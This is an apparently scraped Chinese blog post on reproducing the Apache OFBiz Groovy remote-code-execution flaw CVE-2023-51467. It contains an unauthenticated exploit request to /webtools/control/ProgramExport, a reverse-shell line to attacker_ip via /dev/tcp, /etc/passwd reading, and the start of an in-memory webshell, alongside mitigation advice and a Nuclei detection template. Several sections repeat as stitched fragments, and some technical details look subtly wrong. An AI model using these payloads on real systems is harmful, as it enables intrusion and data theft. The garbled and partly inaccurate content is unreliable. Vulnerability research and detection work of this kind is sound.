Apache OFBiz Groovy RCE漏洞复现分析(CVE-2023-51467)<\/h1>

漏洞概述<\/h2>
Apache OFBiz是一个开源的企业资源规划(ERP)系统，提供了一套企业级应用框架和组件。CVE-2023-51467是OFBiz中存在的一个远程代码执行漏洞，攻击者可以通过精心构造的HTTP请求利用Groovy语言特性在服务器上执行任意代码。<\/p>

漏洞影响<\/h2>

受影响版本<\/strong>：Apache OFBiz < 18.12.11<\/li>
漏洞类型<\/strong>：远程代码执行(RCE)<\/li>
CVSS评分<\/strong>：9.8 (Critical)<\/li>
攻击复杂度<\/strong>：低<\/li>

所需权限<\/strong>：无需认证<\/li> <\/ul>
漏洞原理<\/h2>
该漏洞源于OFBiz对Groovy脚本处理不当，攻击者可以通过控制Groovy脚本参数来执行任意Groovy代码。Groovy是一种基于JVM的动态语言，能够直接调用Java类和方法，这使得攻击者可以利用此特性执行系统命令。<\/p>
环境搭建<\/h2>
准备工作<\/h3>

下载受影响版本的OFBiz：<\/p>
wget https:\/\/archive.apache.org\/dist\/ofbiz\/apache-ofbiz-18.12.10.zip unzip apache-ofbiz-18.12.10.zip <\/code><\/pre> <\/li> 安装Java环境(JDK 8或11)：<\/p> sudo apt install openjdk-11-jdk <\/code><\/pre> <\/li> 启动OFBiz：<\/p> cd apache-ofbiz-18.12.10 .\/gradlew ofbiz <\/code><\/pre> <\/li> <\/ol> 漏洞复现<\/h2> 方法一：通过webtools接口利用<\/h3> 访问webtools接口：<\/p> http:\/\/target:8080\/webtools\/control\/ProgramExport <\/code><\/pre> <\/li> 构造POST请求：<\/p> POST<\/span> \/webtools\/control\/ProgramExport HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target:8080<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>groovyProgram=println "Hello from Groovy"; "calc".execute() <\/span><\/span><\/code><\/pre><\/li> 执行结果：<\/p> 服务器将执行Groovy代码<\/li> 在Windows系统上会弹出计算器(calc)<\/li> 在Linux系统上可以尝试执行"touch \/tmp\/pwned".execute()<\/code><\/li> <\/ul> <\/li> <\/ol> 方法二：通过其他接口利用<\/h3> OFBiz中可能存在多个Groovy脚本执行点，可以通过以下方式发现：<\/p> 查找包含groovyProgram<\/code>、groovy<\/code>等参数的请求<\/li> 尝试在这些参数中注入Groovy代码<\/li> <\/ol> 漏洞分析<\/h2> 关键代码<\/h3> 漏洞主要存在于org.apache.ofbiz.base.util.GroovyUtil<\/code>类中，该类负责Groovy脚本的执行：<\/p> public<\/span> static<\/span> Object runScript<\/span>(<\/span>String groovyScript,<\/span> Map<<\/span>String,<\/span> Object><\/span> context)<\/span> {<\/span> <\/span><\/span> GroovyShell shell =<\/span> new<\/span> GroovyShell();<\/span> <\/span><\/span> return<\/span> shell.<\/span>evaluate<\/span>(<\/span>groovyScript);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>问题点<\/h3> 没有对输入进行任何过滤或沙箱限制<\/li> 直接使用GroovyShell执行用户提供的脚本<\/li> 允许执行任意Java方法，包括Runtime.exec()<\/li> <\/ol> 修复方案<\/h2> 官方修复<\/h3> 升级到OFBiz 18.12.11或更高版本，修复内容包括：<\/p> 对Groovy脚本执行添加了安全限制<\/li> 移除了不安全的脚本执行接口<\/li> <\/ol> 临时缓解措施<\/h3> 如果无法立即升级：<\/p> 禁用webtools应用<\/li> 限制对\/webtools\/control\/ProgramExport<\/code>的访问<\/li> 使用WAF过滤包含groovyProgram<\/code>参数的请求<\/li> <\/ol> 深入利用<\/h2> 获取反向Shell<\/h3> 可以使用以下Groovy代码获取反向Shell：<\/p> def<\/span> cmd =<\/span> "bash -i >& \/dev\/tcp\/attacker_ip\/4444 0>&1"<\/span> <\/span><\/span>cmd.<\/span>execute<\/span>()<\/span> <\/span><\/span><\/code><\/pre>文件读写<\/h3> Groovy可以直接操作文件系统：<\/p> \/\/ 读取文件 <\/span><\/span><\/span><\/span>new<\/span> File<\/span>(<\/span>"\/etc\/passwd"<\/span>).<\/span>text<\/span> <\/span><\/span> <\/span><\/span>\/\/ 写入文件 <\/span><\/span><\/span><\/span>new<\/span> File<\/span>(<\/span>"\/tmp\/test"<\/span>).<\/span>write<\/span>(<\/span>"test content"<\/span>)<\/span> <\/span><\/span><\/code><\/pre>内存马注入<\/h3> 可以通过Groovy代码注入内存马：<\/p> import<\/span> javax.servlet.* <\/span><\/span>import<\/span> org.apache.catalina.core.ApplicationFilterConfig <\/span><\/span>import<\/span> org.apache.catalina.core.StandardContext <\/span><\/span>import<\/span> org.apache.tomcat.util.descriptor.web.FilterDef <\/span><\/span>import<\/span> org.apache.tomcat.util.descriptor.web.FilterMap <\/span><\/span> <\/span><\/span>\/\/ 内存马代码省略... <\/span><\/span><\/span><\/code><\/pre>检测方法<\/h2> 手动检测<\/h3> 检查OFBiz版本是否为受影响版本<\/li> 尝试访问\/webtools\/control\/ProgramExport<\/code>接口<\/li> 发送测试Payload并观察响应<\/li> <\/ol> 自动化检测<\/h3> 可以使用以下Nuclei模板检测：<\/p> id<\/span>: CVE-2023-51467<\/span> <\/span><\/span> <\/span><\/span>info<\/span>: <\/span><\/span> name<\/span>: Apache OFBiz Groovy RCE<\/span> <\/span><\/span> author<\/span>: your_name<\/span> <\/span><\/span> severity<\/span>: critical<\/span> <\/span><\/span> description<\/span>: | <\/span><\/span><\/span> <\/span> Apache OFBiz before 18.12.11 allows RCE via Groovy expressions.<\/span> <\/span><\/span> <\/span><\/span>requests<\/span>: <\/span><\/span> - method<\/span>: POST<\/span> <\/span><\/span> path<\/span>: <\/span><\/span> - "{{BaseURL}}\/webtools\/control\/ProgramExport"<\/span> <\/span><\/span> headers<\/span>: <\/span><\/span> Content-Type<\/span>: application\/x-www-form-urlencoded<\/span> <\/span><\/span> body<\/span>: "groovyProgram=println+System.getProperty(%22java.version%22)"<\/span> <\/span><\/span> matchers<\/span>: <\/span><\/span> - type<\/span>: word<\/span> <\/span><\/span> words<\/span>: <\/span><\/span> - "1.8"<\/span> <\/span><\/span> - "11"<\/span> <\/span><\/span> - "17"<\/span> <\/span><\/span> part<\/span>: body<\/span> <\/span><\/span><\/code><\/pre>总结<\/h2> CVE-2023-51467是一个严重的远程代码执行漏洞，攻击者无需认证即可利用。由于OFBiz常用于企业关键业务系统，此漏洞的危害性极高。建议所有使用OFBiz的组织立即升级到安全版本或实施缓解措施。<\/p> 参考链接<\/h2> Apache OFBiz官方公告<\/a><\/li> NVD漏洞详情<\/a><\/li> GitHub修复提交<\/a><\/li> <\/ol>

Apache OFBiz Groovy RCE漏洞复现分析(CVE-2023-51467)<\/h1>

漏洞原理<\/h2> 该漏洞源于OFBiz对Groovy脚本处理不当，攻击者可以通过控制Groovy脚本参数来执行任意Groovy代码。Groovy是一种基于JVM的动态语言，能够直接调用Java类和方法，这使得攻击者可以利用此特性执行系统命令。<\/p>

环境搭建<\/h2>

漏洞复现<\/h2>

漏洞分析<\/h2>

修复方案<\/h2>

深入利用<\/h2>

检测方法<\/h2>

总结<\/h2> CVE-2023-51467是一个严重的远程代码执行漏洞，攻击者无需认证即可利用。由于OFBiz常用于企业关键业务系统，此漏洞的危害性极高。建议所有使用OFBiz的组织立即升级到安全版本或实施缓解措施。<\/p>

参考链接<\/h2> Apache OFBiz官方公告<\/a><\/li> NVD漏洞详情<\/a><\/li> GitHub修复提交<\/a><\/li> <\/ol>

漏洞原理<\/h2>
该漏洞源于OFBiz对Groovy脚本处理不当，攻击者可以通过控制Groovy脚本参数来执行任意Groovy代码。Groovy是一种基于JVM的动态语言，能够直接调用Java类和方法，这使得攻击者可以利用此特性执行系统命令。<\/p>

总结<\/h2>
CVE-2023-51467是一个严重的远程代码执行漏洞，攻击者无需认证即可利用。由于OFBiz常用于企业关键业务系统，此漏洞的危害性极高。建议所有使用OFBiz的组织立即升级到安全版本或实施缓解措施。<\/p>

参考链接<\/h2>

Apache OFBiz官方公告<\/a><\/li>
NVD漏洞详情<\/a><\/li>
GitHub修复提交<\/a><\/li> <\/ol>